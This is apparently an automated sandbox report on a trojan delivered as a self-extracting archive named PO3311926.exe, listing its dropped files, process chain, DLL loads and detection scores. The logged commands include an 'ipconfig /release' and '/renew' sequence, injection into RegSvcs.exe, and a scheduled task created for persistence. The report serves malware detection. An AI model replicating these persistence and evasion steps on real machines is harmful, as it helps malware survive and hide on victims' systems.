                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AEC7A320_2_00AEC7A3
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A9E89F20_2_00A9E89F
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD291A20_2_00AD291A
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A96AFB20_2_00A96AFB
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AC8B2720_2_00AC8B27
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A8CE3020_2_00A8CE30
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AF51D220_2_00AF51D2
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A9716920_2_00A97169
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A6924020_2_00A69240
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A6949920_2_00A69499
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A8172420_2_00A81724
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A81A9620_2_00A81A96
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A87BAB20_2_00A87BAB
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A69B6020_2_00A69B60
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A87DDA20_2_00A87DDA
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A81D4020_2_00A81D40
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin 3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe 3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: String function: 00BBF5F0 appears 31 times
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: String function: 00BBEC50 appears 56 times
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: String function: 00BBEB78 appears 39 times
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: String function: 00A7FD60 appears 40 times
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: String function: 00A80DC0 appears 46 times
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: String function: 005B0DC0 appears 46 times
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: String function: 005AFD60 appears 40 times
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs PO3311926.exe
                          Source: PO3311926.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@56/58@2/4
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BA6C74 GetLastError,FormatMessageW,0_2_00BA6C74
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005F194F AdjustTokenPrivileges,CloseHandle,8_2_005F194F
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005F1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_005F1F53
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AC194F AdjustTokenPrivileges,CloseHandle,20_2_00AC194F
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AC1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,20_2_00AC1F53
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00605B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,8_2_00605B27
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,8_2_005FDC9C
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00614089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,8_2_00614089
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00BBA6C2
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binFile created: C:\Users\user\wrseJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2512:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeMutant created: NULL
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\bOVQxHmcqdPEzZOw
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1152:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2328:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
                          Source: C:\Users\user\Desktop\PO3311926.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeCommand line argument: sfxname0_2_00BBDF1E
                          Source: C:\Users\user\Desktop\PO3311926.exeCommand line argument: sfxstime0_2_00BBDF1E
                          Source: C:\Users\user\Desktop\PO3311926.exeCommand line argument: STARTDLG0_2_00BBDF1E
                          Source: PO3311926.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\PO3311926.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: PO3311926.exeReversingLabs: Detection: 68%
                          Source: PO3311926.exeVirustotal: Detection: 55%
                          Source: C:\Users\user\Desktop\PO3311926.exeFile read: C:\Users\user\Desktop\PO3311926.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\PO3311926.exe "C:\Users\user\Desktop\PO3311926.exe"
                          Source: C:\Users\user\Desktop\PO3311926.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xl
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\RegSvcs.exe "C:\Users\user\AppData\Roaming\RegSvcs.exe"
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\RegSvcs.exe "C:\Users\user\AppData\Roaming\RegSvcs.exe"
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: unknownProcess created: C:\Users\user\wrse\sdadbtvsh.bin.exe "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\RegSvcs.exe C:\Users\user\AppData\Roaming\RegSvcs.exe
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\PO3311926.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xlJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin sdadbtvsh.bin nngqrvwq.xlJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"Jump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wsock32.dllJump to behavior
